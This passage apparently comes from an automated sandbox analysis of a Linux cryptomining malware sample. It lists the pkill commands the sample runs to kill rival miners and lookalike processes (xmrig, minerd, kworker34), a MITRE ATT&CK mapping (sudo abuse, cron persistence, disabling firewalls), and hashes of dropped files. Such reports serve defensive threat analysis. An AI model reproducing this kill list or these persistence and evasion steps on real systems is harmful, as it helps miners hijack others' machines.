/usr/bin/pkillpkill -f irqba2anc12⤵
-
-
/usr/bin/pkillpkill -f irqba5xnc12⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f irqbnc12⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f ir29xc12⤵
-
-
/usr/bin/pkillpkill -f conns2⤵
-
-
/usr/bin/pkillpkill -f irqbalance2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f crypto-pool2⤵
-
-
/usr/bin/pkillpkill -f XJnRj2⤵
-
-
/usr/bin/pkillpkill -f mgwsl2⤵
-
-
/usr/bin/pkillpkill -f pythno2⤵
-
-
/usr/bin/pkillpkill -f jweri2⤵
-
-
/usr/bin/pkillpkill -f lx262⤵
-
-
/usr/bin/pkillpkill -f NXLAi2⤵
-
-
/usr/bin/pkillpkill -f BI5zj2⤵
-
-
/usr/bin/pkillpkill -f askdljlqw2⤵
-
-
/usr/bin/pkillpkill -f minerd2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f minergate2⤵
-
-
/usr/bin/pkillpkill -f Guard.sh2⤵
-
-
/usr/bin/pkillpkill -f ysaydh2⤵
-
-
/usr/bin/pkillpkill -f bonns2⤵
-
-
/usr/bin/pkillpkill -f donns2⤵
-
-
/usr/bin/pkillpkill -f kxjd2⤵
-
-
/usr/bin/pkillpkill -f Duck.sh2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f bonn.sh2⤵
-
-
/usr/bin/pkillpkill -f conn.sh2⤵
-
-
/usr/bin/pkillpkill -f kworker342⤵
-
-
/usr/bin/pkillpkill -f kw.sh2⤵
-
-
/usr/bin/pkillpkill -f pro.sh2⤵
-
-
/usr/bin/pkillpkill -f polkitd2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f acpid2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f icb5o2⤵
-
-
/usr/bin/pkillpkill -f nopxi2⤵
-
-
/usr/bin/pkillpkill -f irqbalanc12⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f minerd2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f i5862⤵
-
-
/usr/bin/pkillpkill -f gddr2⤵
-
-
/usr/bin/pkillpkill -f mstxmr2⤵
-
-
/usr/bin/pkillpkill -f ddg.20112⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f wnTKYg2⤵
-
-
/usr/bin/pkillpkill -f deamon2⤵
-
-
/usr/bin/pkillpkill -f disk_genius2⤵
-
-
/usr/bin/pkillpkill -f sourplum2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f polkitd2⤵
-
-
/usr/bin/pkillpkill -f nanoWatch2⤵
-
-
/usr/bin/pkillpkill -f zigw2⤵
-
-
/usr/bin/pkillpkill -f devtool2⤵
-
-
/usr/bin/pkillpkill -f devtools2⤵
-
-
/usr/bin/pkillpkill -f systemctI2⤵
-
-
/usr/bin/pkillpkill -f watchbog2⤵
-
-
/usr/bin/pkillpkill -f cryptonight2⤵
-
-
/usr/bin/pkillpkill -f sustes2⤵
-
-
/usr/bin/pkillpkill -f xmrig2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f xmrig-cpu2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f 121.42.151.1372⤵
- Reads CPU attributes
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1Scheduled Task/Job
1Cron
1Defense Evasion
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5B
MD5727479ef7cedf30c03459bec7d87b0f0
SHA12082e7f715f058acab2398d25d135cf5f4c0ce41
SHA25629872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6
SHA5124cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba
-
Filesize
847B
MD5dcebeaac330d2fabb0d77fde9d219ee4
SHA1e27fa8dfc8d846a7e0e8731afae14633b3dcecac
SHA256f58f8a41828796433c48200976a7b2f922f67c9fedb2a2f8fa1689109d17ddf2
SHA512c1443529466ac1e67edc35f6d2f91e30001f8c3f480f924069bb3b8c016f77743473cc713f2a1a0a030b167ce983c6a4499ebce5910dac78895f5744c99b0029
-
Filesize
1KB
MD5ea4491af2baf99537f415d75ce06bd50
SHA185aef97785f274518b80c2931b6a71f8d4aa43c6
SHA2561b0a85571f061a323b17190c02b41b4fadf96733dab0414675e14c543eb123ad
SHA5122e52cdf91e9c727675d4ee338d7ec988d258e9454a2bb50ded4380a3100a28dbf3919cde7baa03bd14996c17f305eb7197ce74618a03d560da9b6a34b4b6025d
-
Filesize
175B
MD564bbc8c2f30b4353e275d53b8b29bf8b
SHA173ac1c615ae1deae8e9d6714a739c13616085194
SHA256103692ccd7d1789fcd45ee9b7f5da073f56db5773b5140234e5da46ecfec54a4
SHA5120a6a22408a63881d188956c1d90f0111fbe83efaed93548549bf16224dbe30ab11b1976c47a32ee3198120750a88097c8977601c638a241c20050f1a207669dd
-
Filesize
318B
MD59fb2950d011536371a8ed94f346fba9d
SHA194e4f20eb7ea8265ff1aa30ee5414ee8113514cc
SHA2561a8bd08e467972ec209c1c12bd9374fc1bb11e411e5a7cb44c378eab27bd0077
SHA512a68c0151d1bba21dc89efd12e7b75ec1900697fe178bb4a6f34ed605798351cddc4b4af1a679bd279ffb0a43d00852244eb2a569de4ac6cf0b26e1fc8e4687a4
-
Filesize
175B
MD5791bcc0af7f62868bd6457e678894f0a
SHA1356185cd761b9943854428f29aa650e764bd557a
SHA2568b34681a3280382654cf79c53dcfcb6e7ef382f9e553cef0d8bf08ee436d9431
SHA512e19f79bfbb3377e9f3bef984c139d7699662389aee24df1159f997aa744ce4aeb59c4ba87438aebeecb33edf226d1ae7ed2d7a222a50693c7e9fcd42d1a5caae
-
Filesize
175B
MD57d83e82a484583fe80a59fd588042dcf
SHA1cd5fdd995d99c06ae6b28570780ff920b9d17e0d
SHA25672afc7ef3fc9db65561135ce9bffce0500f250e2c0599c548094dd6b2f08eed0
SHA5128b7d50ead6596cce4916cfd0aee1911017407f01d3786ac65778dd31c3f14ade842ff9429a75fa178cda41001d87bdc45a7f68b77c4f1a8e6529bf52b58d788c
-
Filesize
175B
MD57be4ec7ad7805d18a824186ce3d1863d
SHA1cbd4235e4eaafbba0087a91ad3b560c8a47d7f6b
SHA256fd79847a1e1cc7e1f2cb4866b5a9edcdab6ec32ef05a2eea71e8723f85584f48
SHA5120347b26a2d2c5bed86668057ed6639bc9c24e26f469f5aad4cc65caa2b45034d0615483220ee1a9acbba6bbb3f9bceb1346f5640e0d14e30b2eb3e4354752b8f
-
Filesize
130B
MD592023ffcc89a077de23daa13cf00ee72
SHA12139624bf5f1ec5b6f5fa9d7d2a783013d40d9dc
SHA256ea1059fd3073e6ec6b604142267f47d331001a78e401a916f14699a696df1f3c
SHA512a00178a0a9bf84df512faef063ac0cf5b5ac5de95c4cf6f91a64279ea835c0ea03f1fd7d2a6e1ea083d58948098d3999f8e90bc940919972d41b57bc6ab9d963
-
Filesize
147B
MD54e8d11e630ab98dc2824c77b3c2ce3cb
SHA149809c4d34dd8207c9ca69ffc3138eff7a836f2c
SHA2569e33721d155cc6145a2eb861f2d5d710fe02f00f5b6cceee7f2a69c3d594aaad
SHA512d7b745a0bbff9af313d44a79d2210ab8883a8722129418c60b1bb1d600736e4fd75b6548b98c086ec5e3b2660e217327f9bbf2b023e67957ac119cac81715fa2
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
918B
MD5b9e9cd08e80b7c91b54dfb19d57f318c
SHA1720115ffaeb62f3318cdb2ae90e734ce33335804
SHA256cb687d50f340149879491d381c55764968dec74f2de03256e4db19818a16d36d
SHA5128cbedb0917b7584a44d3ad510f100d53875619b01d78d63bfe3e85c0bc60c2440cb9ecb92e912c32c02f30a4b88f3555ec1872dc21ea689437b8b5d8861dd62b
-
Filesize
918B
MD5d20e8e626a633377920d122a1ac48f04
SHA10acfec76cffbc0f655fc76ecd27a2e006b3255a8
SHA256dc8cf67a5129e2d8275fa27e118135a2799d253d4da9830e820387a9e35a3dbf
SHA5127c328fbc5881fb07cbe8d37ad019f972befb0d1a91e1b06a195349c12e3c0191489836d5adb5c8e2b001caa10fba6becb3c6d19260c9b444c5b330094ae7016c
-
Filesize
89B
MD5a12b134557b5e44edf2258ec2cf49cb3
SHA10da235ab54998708dfef07fd8209cd6f7750e12f
SHA25618c045f8b0c77c4c0b5e8d83298f46dadfce65896f4f77459e4d8a7cef7322aa
SHA5120b34b8be0171c153a34f53ad136fe3174be1a71922ccb09505197de87bfa9373e02b7f7a71e9ba90891642faba81702948c400d16bff7f624aab46aa58b8d8e6
-
Filesize
288B
MD5ed00e7c61d36f7b076ac75a09a3ce4e2
SHA172dfca167c30c6ac7fc60ad53033161902012bb7
SHA25679d99b8f6ceda959fe3801f6c9cdccb35493ecf4df374b16fde690132cf1a122
SHA512ae25de9affde7dd8ec4056dea51470f3f040d636058467ff0b2d74ac93f8de7b2630cbdc007fd5064fb3aba536e3b8a81812afbceacbf1178db4b769a42ef945
-
Filesize
288B
MD5a3a078904ae1aa688bb9cb1fb8fe4310
SHA1763ab73d6a98ff3b75293dbf498e005cd13f9d79
SHA2563adfe06e9d1fe3bb412b5a6e698585632c46964688c84af6e848da69f1bd764d
SHA512582ecdb274ef0accc039ab4d892764fe906318dbe2730874b408cfe3e28b39c1e3bf4f87e1b0c5b710d2ae84e9d5f23818e0443eb8692430285f025538f301e6
-
Filesize
89B
MD5d29e330abdfbb6ca69c4660e70145c08
SHA13bce9f59d4398ada3886d42ac59a004259c671dd
SHA256d3de5e69a5e544cbbacde79e7030049603ef684d5d6280b1f937a122be55f778
SHA512a602ea502ba4e27f332cebc7e48f90b91d2f845cf5c2317070248e61035de728e377bcc4b342b158c4e4e8ddbdbcc761a36db1223454ac040659ba4a1a794104